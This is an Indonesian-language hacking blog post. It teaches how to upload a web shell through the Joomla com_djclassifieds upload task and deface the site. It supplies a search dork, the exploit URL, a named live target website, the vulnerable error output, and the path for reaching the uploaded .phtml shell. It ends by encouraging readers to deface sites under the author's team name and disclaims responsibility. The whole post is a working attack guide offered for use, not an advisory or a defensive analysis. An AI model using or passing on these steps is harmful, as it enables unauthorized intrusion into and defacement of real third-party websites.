DEFACE Joomla com_djclassifieds UPSHELL

RUTH72_
Agustus 18, 2019
4

Assalamualaikum Wr.Wb
Kembali lagi Bersama Saya RUTH72_
Kali Ini saya akan memberi Sedikit Turtorial 

Ok Kita Langsung Ke Tutorial Nya aja ya hehe :v



Bahan-bahan :



Dork: inurl:=com_djclassifieds 

        ( Use your brain )



Exploit :

index.php?option=com_djclassifieds&task=upload&tmpl=component


Live Target : http://grupoposgar.es/

Csrf  type " file " > DISINI :D


Step by step :

1 . dorking menggukan dork dia atas , karena saya punya live target , ikutti saja step by step .



2 . jangan lupa masukkan exploit nya .

http://grupoposgar.es/index.php?option=com_djclassifieds&task=upload&tmpl=component

3 . jika vlun ada tulisan , seperti gambar di bawah .



Notice: Undefined variable: contentType in /homepages/41/d603710153/htdocs/Posgar_2/administrator/components/com_djclassifieds/lib/djupload.php on line 320
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}

4 . gunakan csrf nya dan upload file .



5 jika berhasil berhasil kembali ke tulisan vlun pertama / {"jsonrpc" : "2.0", "result" : null, "id" : "id"}



DONE

Akses Shell:
http://website.site/tmp/djupload/namafile.phtml/PhP

Note: ext harus phtml dan PhP

Ok Cukup Sampe Sini Tutorial Nya Semoga Bermanfaat Untuk Kalian
Jangan Lupa Di Share ya :)

Kalo Mau Daface, Saya nitip nick :v RUTH72_ Dan Nama Team nya Juga GARUDA TERSAKTI 72
Happy Deface ^_^
Enjoy Your Live :')

note:
HANYA UNTUK BERBAGI, PENYALAHGUNAAN BUKAN TANGGUNGJAWAB KAMI :)
DAN BUKAN BERMAKSUD UNTUK MENGGURUI~





Tag : hackingTutorial